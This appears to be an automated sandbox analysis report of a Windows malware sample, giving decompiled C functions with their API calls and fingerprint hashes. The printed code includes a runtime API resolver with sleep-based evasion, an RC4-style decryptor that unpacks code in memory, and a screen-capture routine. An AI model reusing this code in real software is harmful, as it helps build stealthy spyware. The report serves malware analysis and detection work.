    				_push(0x55f6b799);
    				_t286 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x1c));
    				asm("movd mm3, edi");
    				do {
    					_t224 =  *((intOrPtr*)(_t286 + 8));
    					_t303 =  *((char*)(_t286 + 0x1c)) - 0x18;
    					_t286 =  *_t286;
    				} while (_t303 != 0);
    				asm("movd mm4, edi");
    				_t182 = _t224;
    				_t213 =  *((intOrPtr*)( *((intOrPtr*)(_t182 + 0x3c)) + _t182 + 0x78));
    				_t214 = _t213 + _t182;
    				_t287 = 0;
    				_v28 = 0;
    				_v24 = 0;
    				if( *((intOrPtr*)(_t213 + _t182 + 0x18)) == 0) {
    					L14:
    					_t215 = 0x288f2d;
    					do {
    						_t184 = _v32 + 1;
    						_v16 = _v16 + _t184;
    						_v32 = _t184;
    						if(_t184 >= 0xa3) {
    							_v16 = _v16 - 1;
    						}
    						_t215 = _t215 - 1;
    					} while (_t215 != 0);
    					_t288 = 0;
    					do {
    						 *(_t302 + _t288 * 4 - 0x41c) = _t288;
    						if(_t288 <= 0x45) {
    							Sleep(_t288); // executed
    						}
    						_t288 = _t288 + 1;
    					} while (_t288 < 0x100);
    					Sleep(0x20c); // executed
    					VirtualProtect(_a4, _a12, 0x40,  &_v8);
    					 *0x41ddad = 0xe481703c;
    					 *0x0041DD34 = 0xfc0ca23d;
    					_t207 = _a8;
    					_t219 = 0;
    					_t58 = _t219 + 2; // 0x2
    					_t289 = _t58;
    					do {
    						_t270 = ( *(_t219 % _a16 + _t207) & 0x000000ff) +  *(_t302 + _t219 * 4 - 0x41c) + _v20 & 0x800000ff;
    						if(_t270 < 0) {
    							_t270 = (_t270 - 0x00000001 | 0xffffff00) + 1;
    						}
    						 *(_t302 + _t219 * 4 - 0x41c) =  *(_t302 + _t270 * 4 - 0x41c);
    						 *(_t302 + _t270 * 4 - 0x41c) =  *(_t302 + _t219 * 4 - 0x41c) & 0x000000ff;
    						_t82 = _t289 - 1; // 0x1
    						_t272 = _t270 + ( *(_t82 % _a16 + _t207) & 0x000000ff) +  *(_t302 + _t219 * 4 - 0x418) & 0x800000ff;
    						if(_t272 < 0) {
    							_t272 = (_t272 - 0x00000001 | 0xffffff00) + 1;
    						}
    						 *(_t302 + _t219 * 4 - 0x418) =  *(_t302 + _t272 * 4 - 0x41c);
    						 *(_t302 + _t272 * 4 - 0x41c) =  *(_t302 + _t219 * 4 - 0x418) & 0x000000ff;
    						_t274 = _t272 + ( *(_t289 % _a16 + _t207) & 0x000000ff) +  *(_t302 + _t219 * 4 - 0x414) & 0x800000ff;
    						if(_t274 < 0) {
    							_t274 = (_t274 - 0x00000001 | 0xffffff00) + 1;
    						}
    						 *(_t302 + _t219 * 4 - 0x414) =  *(_t302 + _t274 * 4 - 0x41c);
    						 *(_t302 + _t274 * 4 - 0x41c) =  *(_t302 + _t219 * 4 - 0x414) & 0x000000ff;
    						_t127 = _t289 + 1; // 0x3
    						_t245 = ( *(_t127 % _a16 + _t207) & 0x000000ff) +  *(_t302 + _t219 * 4 - 0x410) + _t274 & 0x800000ff;
    						if(_t245 < 0) {
    							_t245 = (_t245 - 0x00000001 | 0xffffff00) + 1;
    						}
    						_t275 = _t302 + _t245 * 4 - 0x41c;
    						_v20 = _t245;
    						 *(_t302 + _t219 * 4 - 0x410) =  *_t275;
    						_t202 =  *(_t302 + _t219 * 4 - 0x410) & 0x000000ff;
    						_t289 = _t289 + 4;
    						_t219 = _t219 + 4;
    						 *_t275 = _t202;
    					} while (_t289 < 0x102);
    					_t276 = _a12;
    					_t203 = 0;
    					if(_t276 == 0) {
    						L44:
    						return VirtualProtect(_a4, _t276, _v8,  &_v12);
    					}
    					do {
    						if(_t203 < _a20 || _t203 > _a24) {
    							_t219 = _t219 + 0x00000001 & 0x800000ff;
    							if(_t219 < 0) {
    								_t219 = (_t219 - 0x00000001 | 0xffffff00) + 1;
    							}
    							_t292 =  *(_t302 + _t219 * 4 - 0x41c) + _v20 & 0x800000ff;
    							if(_t292 < 0) {
    								_t292 = (_t292 - 0x00000001 | 0xffffff00) + 1;
    							}
    							_v20 = _t292;
    							_t249 =  *(_t302 + _t219 * 4 - 0x41c) & 0x000000ff;
    							 *(_t302 + _t219 * 4 - 0x41c) =  *(_t302 + _t292 * 4 - 0x41c);
    							 *(_t302 + _t292 * 4 - 0x41c) = _t249;
    							_t296 =  *(_t302 + _t219 * 4 - 0x41c) + _t249 & 0x800000ff;
    							if(_t296 < 0) {
    								_t296 = (_t296 - 0x00000001 | 0xffffff00) + 1;
    							}
    							 *(_t203 + _a4) =  *(_t203 + _a4) ^  *(_t302 + _t296 * 4 - 0x41c) & 0x000000ff;
    						}
    						_t203 = _t203 + 1;
    					} while (_t203 < _t276);
    					goto L44;
    				}
    				_t284 =  *((intOrPtr*)(_t214 + 0x20)) + _t182;
    				do {
    					if(_t284 == 0) {
    						goto L13;
    					}
    					if(_v28 != 0) {
    						L10:
    						if(_t206 == 0 &&  *((intOrPtr*)(_t182 +  *_t284)) == 0x65656c53) {
    							_t206 =  *((intOrPtr*)( *((intOrPtr*)(_t214 + 0x1c)) + ( *( *((intOrPtr*)(_t214 + 0x24)) + _t287 * 2 + _t182) & 0x0000ffff) * 4 + _t182)) + _t182;
    							_v24 = _t206;
    						}
    						goto L13;
    					}
    					_t254 =  *_t284;
    					if( *((intOrPtr*)(_t254 + _t182)) != 0x74726956 ||  *((intOrPtr*)(_t254 + _t182 + 4)) != 0x506c6175 ||  *((intOrPtr*)(_t254 + _t182 + 8)) != 0x65746f72) {
    						goto L10;
    					} else {
    						_t206 = _v24;
    						_v28 =  *((intOrPtr*)( *((intOrPtr*)(_t214 + 0x1c)) + ( *( *((intOrPtr*)(_t214 + 0x24)) + _t287 * 2 + _t182) & 0x0000ffff) * 4 + _t182)) + _t182;
    					}
    					L13:
    					_t287 = _t287 + 1;
    					_t284 = _t284 + 4;
    				} while (_t287 <  *((intOrPtr*)(_t214 + 0x18)));
    				goto L14;
    			}

    APIs
    • Sleep.KERNELBASE(00000000), ref: 00409E96
    • Sleep.KERNELBASE(0000020C), ref: 00409EA6
    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 00409EB6
    • VirtualProtect.KERNELBASE(?,?,FC0CA23D,?,?,?,?,?), ref: 0040A09F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: ProtectSleepVirtual
    • String ID: 4roteualP$Slee$Virt$rote$ualP
    • API String ID: 4088328274-2735038800
    • Opcode ID: d83611f036b68efe369b722386888c60b329ce7402a6378ad47c0ac1763d9921
    • Instruction ID: 04a1e5600cfa775f1d947e31be1fc21062162248b24dcc2dafc41bb955e9babf
    • Opcode Fuzzy Hash: d83611f036b68efe369b722386888c60b329ce7402a6378ad47c0ac1763d9921
    • Instruction Fuzzy Hash: E5A1B7B190011A8BCB10CF55D8806EAB7B1FF98308F29C57ACD59A7386D338AD528FD4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E00415510(intOrPtr* __edi, struct _SECURITY_DESCRIPTOR* __esi) {
    				char _v16;
    				int _v20;
    				int _v24;
    				struct _ACL* _v28;
    				void* _v32;
    				void* _t15;
    				void* _t16;
    				intOrPtr* _t27;
    				struct _SECURITY_DESCRIPTOR* _t28;
    
    				_t28 = __esi;
    				_t27 = __edi;
    				if(InitializeSecurityDescriptor(__esi, 1) == 0 || SetSecurityDescriptorDacl(__esi, 1, 0, 0) == 0) {
    					return 0;
    				} else {
    					_t15 =  &_v16;
    					__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;;NRNWNX;;;LW)", 1, _t15, 0); // executed
    					if(_t15 == 0) {
    						L6:
    						_t16 = _t15 | 0xffffffff;
    						L8:
    						if(_t27 == 0) {
    							return _t16;
    						} else {
    							 *_t27 = 0xc;
    							 *(_t27 + 4) = _t28;
    							 *(_t27 + 8) = 0;
    							return _t16;
    						}
    					}
    					_v28 = 0;
    					if(GetSecurityDescriptorSacl(_v32,  &_v20,  &_v28,  &_v24) == 0 || SetSecurityDescriptorSacl(__esi, _v20, _v28, _v24) == 0) {
    						_t15 = LocalFree(_v32);
    						goto L6;
    					} else {
    						_t16 = _v32;
    						goto L8;
    					}
    				}
    			}

    APIs
    • InitializeSecurityDescriptor.ADVAPI32(0042E93C,00000001,?,0041CB8C,?,00000000), ref: 00415516
    • SetSecurityDescriptorDacl.ADVAPI32(0042E93C,00000001,00000000,00000000,?,0041CB8C,?,00000000), ref: 0041552B
    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00415547
    • GetSecurityDescriptorSacl.ADVAPI32 ref: 0041556D
    • SetSecurityDescriptorSacl.ADVAPI32(0042E93C,?,?,?), ref: 00415587
    • LocalFree.KERNEL32 ref: 00415595
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
    • String ID: S:(ML;;NRNWNX;;;LW)
    • API String ID: 2050860296-820036962
    • Opcode ID: f5ba2e801825e1a54cea10cf959499a00a1d5144bdb0018afe9a2e3c59ca4b86
    • Instruction ID: fc2951b30ceb4b2013b7860237aee02788832248db0c92337de632304ae91493
    • Opcode Fuzzy Hash: f5ba2e801825e1a54cea10cf959499a00a1d5144bdb0018afe9a2e3c59ca4b86
    • Instruction Fuzzy Hash: 72116074215601FBE7109F14CD44FE777AAABC4B00F40891DF599D62D0E7B8D984876A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E0041CAF0(void* __ecx, void* __edx, void* __edi, signed int _a4) {
    				char _v404;
    				void* __esi;
    				signed int _t10;
    				signed int _t13;
    				signed int _t15;
    				signed int _t16;
    				signed int _t18;
    				signed int _t21;
    				signed int _t22;
    				signed int _t23;
    				void* _t24;
    				void* _t30;
    				void* _t36;
    				signed int _t39;
    
    				_t36 = __edi;
    				_t30 = __ecx;
    				_t8 = _a4;
    				_t39 = _a4 & 0x00000001;
    				if(_t39 == 0) {
    					 *0x42e8f8 = 0;
    				}
    				if(E0041C530(_t8) != 0) {
    					_t10 = HeapCreate(0, 0x80000, 0); // executed
    					 *0x42e6d4 = _t10;
    					__eflags = _t10;
    					if(_t10 != 0) {
    						 *0x42d48b = 1;
    					} else {
    						 *0x42e6d4 = GetProcessHeap();
    						 *0x42d48b = 0;
    					}
    					 *0x42dd08 = 0;
    					 *0x42d48a = 0;
    					InitializeCriticalSection(0x42e6e8);
    					 *0x42e700 = 0; // executed
    					__imp__#115(0x202,  &_v404); // executed
    					_t13 = E0041C670(_a4, _t36, _t39);
    					__eflags = _t13;
    					if(_t13 == 0) {
    						goto L3;
    					} else {
    						__eflags = _t39;
    						if(__eflags != 0) {
    							L10:
    							_t15 = E0041C730(_t30, _t36, _t39, __eflags);
    							__eflags = _t15;
    							if(_t15 == 0) {
    								goto L3;
    							} else {
    								_t16 = E0041C780(_t15, _a4);
    								__eflags = _t16;
    								if(_t16 == 0) {
    									goto L3;
    								} else {
    									 *0x42eb68 = GetCurrentProcessId();
    									 *0x42eb6c = 0;
    									__eflags = _t39;
    									if(_t39 != 0) {
    										L16:
    										_push(_a4);
    										_t18 = E0041C8E0();
    										__eflags = _t18;
    										if(_t18 == 0) {
    											goto L3;
    										} else {
    											__eflags = _a4 & 0x00000002;
    											 *0x42e6e4 = 0;
    											 *0x42d4f8 = 0;
    											 *0x42ee18 = 0;
    											 *0x42d490 = 0;
    											 *0x42d428 = 0;
    											 *0x42e788 = 0;
    											 *0x42e720 = 0;
    											if((_a4 & 0x00000002) == 0) {
    												L19:
    												return 1;
    											} else {
    												_t21 = E0041C9D0();
    												__eflags = _t21;
    												if(_t21 == 0) {
    													goto L3;
    												} else {
    													goto L19;
    												}
    											}
    										}
    									} else {
    										_t22 = E0041C840();
    										__eflags = _t22;
    										if(_t22 == 0) {
    											goto L3;
    										} else {
    											__eflags = _t39;
    											if(_t39 != 0) {
    												goto L16;
    											} else {
    												_t23 = E0041C8A0();
    												__eflags = _t23;
    												if(_t23 == 0) {
    													goto L3;
    												} else {
    													goto L16;
    												}
    											}
    										}
    									}
    								}
    							}
    						} else {
    							_t24 = CreateEventW(0x42e930, 1, 0, 0);
    							 *0x42edbc = _t24;
    							 *0x42edc0 = 0xffffffff;
    							__eflags = _t24;
    							if(__eflags == 0) {
    								goto L3;
    							} else {
    								goto L10;
    							}
    						}
    					}
    				} else {
    					L3:
    					return 0;
    				}
    			}

    APIs
    • HeapCreate.KERNELBASE(00000000,00080000,00000000,00000000,?,00000000), ref: 0041CB2E
    • GetProcessHeap.KERNEL32(?,00000000), ref: 0041CB3D
    • InitializeCriticalSection.KERNEL32(0042E6E8,?,00000000), ref: 0041CB68
    • WSAStartup.WS2_32(00000202,?), ref: 0041CB7E
    • CreateEventW.KERNEL32(0042E930,00000001,00000000,00000000,?,00000000), ref: 0041CB9D
    • GetCurrentProcessId.KERNEL32(00000000,?,00000000), ref: 0041CBD8
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateHeapProcess$CriticalCurrentEventInitializeSectionStartup
    • String ID:
    • API String ID: 3930056065-0
    • Opcode ID: a8e31060e178ac4c2593aecad6c8bec67f9f5d957ed8b9859a85983697928152
    • Instruction ID: 94ed06b3fbce81b2969c167204fe336d9944c2f3f045b6f968cfe4c9bd247dfc
    • Opcode Fuzzy Hash: a8e31060e178ac4c2593aecad6c8bec67f9f5d957ed8b9859a85983697928152
    • Instruction Fuzzy Hash: 053104B1B942449ACB30FF35BCC66D63754AB15384B80013FE954D73A1E77968C28B9E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 26%
    			E00416D20() {
    				intOrPtr _v16;
    				intOrPtr _v28;
    				char _v520;
    				short _v540;
    				short _v552;
    				short _v656;
    				char _v732;
    				char _v740;
    				char _v752;
    				char* _t15;
    				void* _t21;
    				void* _t28;
    				intOrPtr* _t38;
    
    				_t15 =  &_v520;
    				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t15); // executed
    				if(_t15 != 0) {
    					L8:
    					E00410870(_v16, _v16, 0, 0x10);
    					return 0;
    				} else {
    					PathAddBackslashW( &_v540);
    					_t38 = __imp__GetVolumeNameForVolumeMountPointW;
    					_t21 =  *_t38( &_v540,  &_v740, 0x64); // executed
    					if(_t21 != 0) {
    						L5:
    						if(_v732 != 0x7b) {
    							goto L8;
    						} else {
    							_v656 = 0;
    							__imp__CLSIDFromString( &_v732, _v28);
    							if(0 != 0) {
    								goto L8;
    							} else {
    								return 0;
    							}
    						}
    					} else {
    						while(1) {
    							PathRemoveBackslashW( &_v552);
    							if(PathRemoveFileSpecW( &_v552) == 0) {
    								goto L8;
    							}
    							PathAddBackslashW( &_v552);
    							_t28 =  *_t38( &_v552,  &_v752, 0x64); // executed
    							if(_t28 == 0) {
    								continue;
    							} else {
    								goto L5;
    							}
    							goto L9;
    						}
    						goto L8;
    					}
    				}
    				L9:
    			}

    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,00000000,?,00000000), ref: 00416D3A
    • PathAddBackslashW.SHLWAPI(?,?,00000000,?,00000000), ref: 00416D56
    • GetVolumeNameForVolumeMountPointW.KERNELBASE(?,00000064,00000064,?,00000000,?,00000000), ref: 00416D6D
    • PathRemoveBackslashW.SHLWAPI(?,?,00000000,?,00000000), ref: 00416D88
    • PathRemoveFileSpecW.SHLWAPI(?,?,00000000,?,00000000), ref: 00416D92
    • PathAddBackslashW.SHLWAPI(?,?,00000000,?,00000000), ref: 00416DA0
    • GetVolumeNameForVolumeMountPointW.KERNELBASE(?,00000064,00000064,?,00000000,?,00000000), ref: 00416DB1
    • CLSIDFromString.OLE32(?,?), ref: 00416DD3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Path$Volume$Backslash$MountNamePointRemove$FileFolderFromSpecString
    • String ID: {
    • API String ID: 533550053-366298937
    • Opcode ID: 81651ece8f0824eb6db95760027964cdd39881c34e909f3106671e4a471655c4
    • Instruction ID: 70b75c34f6867e1d353f79dcc71a002376c79a05a8f0dad77b9e9410b1e1dcb9
    • Opcode Fuzzy Hash: 81651ece8f0824eb6db95760027964cdd39881c34e909f3106671e4a471655c4
    • Instruction Fuzzy Hash: 4521957624434166D730DBA1EC84FDB73ECAB88750F00492FF644A7190E675E988CB7A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			_entry_(void* __ecx, void* __edx, void* __edi, void* __esi) {
    				int _v4;
    				char _v8;
    				char _v12;
    				char _v13;
    				char _v16;
    				char _v20;
    				char _v21;
    				void* _t22;
    				void* _t26;
    				char _t28;
    				char _t32;
    				short* _t36;
    				void* _t38;
    				signed int _t42;
    				intOrPtr _t45;
    
    				_t32 = 0; // executed
    				_t22 = E0041CAF0(__ecx, __edx, __edi, 0); // executed
    				if(_t22 == 0) {
    					L21:
    					__eflags = _t32;
    					_t21 = _t32 == 0;
    					__eflags = _t21;
    					ExitProcess(0 | _t21);
    				}
    				_v8 = 0;
    				_v12 = 1;
    				_v13 = 0;
    				SetErrorMode(0x8007);
    				_t26 = CommandLineToArgvW(GetCommandLineW(),  &_v4);
    				if(_t26 == 0) {
    					L16:
    					_t28 = E0041D940(__eflags, _v16, _v20);
    					goto L17;
    				} else {
    					_t45 = _v12;
    					_t42 = 0;
    					if(_t45 > 0) {
    						do {
    							_t36 =  *((intOrPtr*)(_t26 + _t42 * 4));
    							if(_t36 != 0 &&  *_t36 == 0x2d) {
    								_t38 = ( *(_t36 + 2) & 0x0000ffff) + 0xffffff9a;
    								if(_t38 <= 0x10) {
    									switch( *((intOrPtr*)(( *(_t38 + E0041DE40) & 0x000000ff) * 4 +  &M0041DE2C))) {
    										case 0:
    											_v16 = 1;
    											goto L11;
    										case 1:
    											_t32 = 1;
    											goto L11;
    										case 2:
    											_v20 = 0;
    											goto L11;
    										case 3:
    											_v21 = 1;
    											goto L11;
    										case 4:
    											goto L11;
    									}
    								}
    							}
    							L11:
    							_t42 = _t42 + 1;
    						} while (_t42 < _t45);
    					}
    					LocalFree(_t26);
    					_t55 = _t32;
    					if(_t32 == 0) {
    						__eflags = _v21;
    						if(__eflags == 0) {
    							goto L16;
    						} else {
    							E004266C0();
    							_t32 = E0041C040();
    							_t28 = E00426790();
    						}
    					} else {
    						_t28 = E0041D6F0(_t55);
    						L17:
    						_t32 = _t28;
    					}
    				}
    				if(_t32 == 0 || ( *0x42e8f8 & 0x00000002) == 0) {
    					goto L21;
    				}
    				Sleep(0xffffffff);
    				return _t28;
    			}

    APIs
    • SetErrorMode.KERNEL32 ref: 0041DD57
    • GetCommandLineW.KERNEL32(?), ref: 0041DD62
    • CommandLineToArgvW.SHELL32(00000000), ref: 0041DD69
    • LocalFree.KERNEL32(00000000), ref: 0041DDC6
    • Sleep.KERNEL32(000000FF,00000001,00000000), ref: 0041DE12
    • ExitProcess.KERNEL32 ref: 0041DE25
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CommandLine$ArgvErrorExitFreeLocalModeProcessSleep
    • String ID:
    • API String ID: 3718487608-0
    • Opcode ID: 8c182f0e78debcfcb910ec5c01f5569e7b68220ba176df76f4367427a46a1214
    • Instruction ID: 4c7482349d1bab18395e1777bbb6e7bca6f38983f1649904a7398465943e1ee4
    • Opcode Fuzzy Hash: 8c182f0e78debcfcb910ec5c01f5569e7b68220ba176df76f4367427a46a1214
    • Instruction Fuzzy Hash: 95212CB0D493A19AD7146B3898147EB3B80AF52319F08885FF4915B292CB7E84C5875B
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 54%
    			E0041E910() {
    				_Unknown_base(*)()* _t160;
    				struct HINSTANCE__* _t161;
    				struct HINSTANCE__* _t166;
    				_Unknown_base(*)()* _t167;
    				struct HICON__* _t184;
    				struct HINSTANCE__* _t230;
    				struct HINSTANCE__* _t269;
    				intOrPtr* _t272;
    				intOrPtr* _t279;
    				_Unknown_base(*)()* _t280;
    				void* _t287;
    
    				VirtualProtect(E00409C70, 0x5dc, 4, _t287 + 0xa0);
    				_t230 = 0;
    				 *((intOrPtr*)(_t287 + 0x24)) = 0;
    				 *((intOrPtr*)(_t287 + 0x58)) = 0;
    				 *((intOrPtr*)(_t287 + 0x64)) = 1;
    				 *((intOrPtr*)(_t287 + 0x68)) = 0;
    				 *((intOrPtr*)(_t287 + 0x6c)) = 0;
    				 *(_t287 + 0x70) = 0;
    				_t269 = LoadLibraryA("gdiplus.dll");
    				 *((intOrPtr*)(_t287 + 0x30)) = GetProcAddress(_t269, "GdiplusStartup");
    				 *(_t287 + 0x54) = GetProcAddress(_t269, "GdiplusShutdown");
    				 *((intOrPtr*)(_t287 + 0x58)) = GetProcAddress(_t269, "GdipCreateBitmapFromHBITMAP");
    				 *((intOrPtr*)(_t287 + 0x4c)) = GetProcAddress(_t269, "GdipDisposeImage");
    				 *((intOrPtr*)(_t287 + 0x50)) = GetProcAddress(_t269, "GdipGetImageEncodersSize");
    				 *((intOrPtr*)(_t287 + 0x64)) = GetProcAddress(_t269, "GdipGetImageEncoders");
    				_t160 = GetProcAddress(_t269, "GdipSaveImageToStream");
    				 *(_t287 + 0x70) = _t160;
    				if( *((intOrPtr*)(_t287 + 0x28)) == 0 ||  *((intOrPtr*)(_t287 + 0x4c)) == 0 ||  *((intOrPtr*)(_t287 + 0x50)) == 0 ||  *((intOrPtr*)(_t287 + 0x44)) == 0 ||  *((intOrPtr*)(_t287 + 0x48)) == 0 ||  *(_t287 + 0x5c) == 0 || _t160 == 0) {
    					L70:
    					if(_t269 != 0) {
    						FreeLibrary(_t269);
    					}
    					_t161 =  *(_t287 + 0x54);
    					if(_t161 != 0) {
    						FreeLibrary(_t161);
    					}
    					if(_t230 != 0) {
    						FreeLibrary(_t230);
    					}
    					return  *((intOrPtr*)(_t287 + 0x20));
    				} else {
    					_t166 = LoadLibraryA("ole32.dll");
    					 *(_t287 + 0x5c) = _t166;
    					_t167 = GetProcAddress(_t166, "CreateStreamOnHGlobal");
    					 *(_t287 + 0x7c) = _t167;
    					if(_t167 == 0) {
    						goto L70;
    					}
    					_t230 = LoadLibraryA("gdi32.dll");
    					_t279 = GetProcAddress(_t230, "CreateDCW");
    					 *((intOrPtr*)(_t287 + 0x20)) = GetProcAddress(_t230, "CreateCompatibleDC");
    					 *(_t287 + 0x2c) = GetProcAddress(_t230, "CreateCompatibleBitmap");
    					 *((intOrPtr*)(_t287 + 0x24)) = GetProcAddress(_t230, "GetDeviceCaps");
    					 *((intOrPtr*)(_t287 + 0x40)) = GetProcAddress(_t230, "SelectObject");
    					 *((intOrPtr*)(_t287 + 0x1c)) = GetProcAddress(_t230, "BitBlt");
    					 *((intOrPtr*)(_t287 + 0x44)) = GetProcAddress(_t230, "DeleteObject");
    					_t272 = GetProcAddress(_t230, "DeleteDC");
    					 *((intOrPtr*)(_t287 + 0x40)) = _t272;
    					if(_t279 == 0 ||  *(_t287 + 0x18) == 0 ||  *((intOrPtr*)(_t287 + 0x24)) == 0 ||  *((intOrPtr*)(_t287 + 0x1c)) == 0 ||  *((intOrPtr*)(_t287 + 0x38)) == 0 ||  *((intOrPtr*)(_t287 + 0x14)) == 0 ||  *((intOrPtr*)(_t287 + 0x3c)) == 0 || _t272 == 0) {
    						goto L70;
    					} else {
    						 *((intOrPtr*)(_t287 + 0x6c)) = 1;
    						 *(_t287 + 0x70) = 0;
    						 *((intOrPtr*)(_t287 + 0x74)) = 0;
    						 *((intOrPtr*)(_t287 + 0x78)) = 0;
    						 *((intOrPtr*)(_t287 + 0x34))(_t287 + 0x80, _t287 + 0x64, 0);
    						if(0 != 0) {
    							goto L70;
    						}
    						 *_t279(L"DISPLAY", 0, 0, 0);
    						_t280 = 0;
    						 *((intOrPtr*)(_t287 + 0x28)) = 0;
    						if(0 == 0) {
    							L69:
    							 *((intOrPtr*)(_t287 + 0x50))( *((intOrPtr*)(_t287 + 0x78)));
    							goto L70;
    						}
    						 *((intOrPtr*)(_t287 + 0x1c))(0);
    						 *((intOrPtr*)(_t287 + 0x34)) = 0;
    						if(0 == 0) {
    							 *_t272(_t280);
    							goto L69;
    						}
    						_t184 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
    						 *(_t287 + 0x18) = _t184;
    						if(_t184 == 0 || GetIconInfo(_t184, _t287 + 0xa4) != 0 && GetCursorPos(_t287 + 0x2c) != 0) {
    							 *((intOrPtr*)(_t287 + 0xd4)) = 0;
    						}
    						goto L24;
    					}
    				}
    			}

    APIs
    • VirtualProtect.KERNEL32(00409C70,000005DC,00000004,?,?,00000000,?,00000000), ref: 0041E92E
    • LoadLibraryA.KERNEL32 ref: 0041E95D
    • GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0041E96D
    • GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0041E979
    • GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0041E985
    • GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0041E991
    • GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0041E99D
    • GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041E9A9
    • GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0041E9B5
    • LoadLibraryA.KERNEL32(ole32.dll), ref: 0041EA04
    • GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041EA10
    • LoadLibraryA.KERNEL32(gdi32.dll), ref: 0041EA23
    • GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0041EA2D
    • GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0041EA37
    • GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0041EA43
    • GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0041EA4F
    • GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0041EA5B
    • GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0041EA67
    • GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0041EA73
    • GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 0041EA7F
    • LoadImageW.USER32 ref: 0041EB44
    • GetIconInfo.USER32(00000000,?), ref: 0041EB5D
    • GetCursorPos.USER32(?), ref: 0041EB6C
    • DrawIcon.USER32 ref: 0041EC56
    • lstrcmpiW.KERNEL32(?,00000000), ref: 0041ECF0
    • FreeLibrary.KERNEL32(00000000), ref: 0041EE8C
    • FreeLibrary.KERNEL32(?), ref: 0041EE97
    • FreeLibrary.KERNEL32(00000000), ref: 0041EE9E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfoProtectVirtuallstrcmpi
    • String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll
    • API String ID: 1175787026-1167942225
    • Opcode ID: 48a644a70f77b69276f66e33cb866b904dff545216c0b225d61956a8e854552d
    • Instruction ID: 81d33746789f1644a98cb2cd7f72d117c53285fc7d8e87af8e34fa5fc1218cda
    • Opcode Fuzzy Hash: 48a644a70f77b69276f66e33cb866b904dff545216c0b225d61956a8e854552d
    • Instruction Fuzzy Hash: D5E16E75A48305AFD720DF66C844B9FBBE8BF88B40F04492EF989D2250D778D944CB96
    Uniqueness

    Uniqueness Score: -1.00%

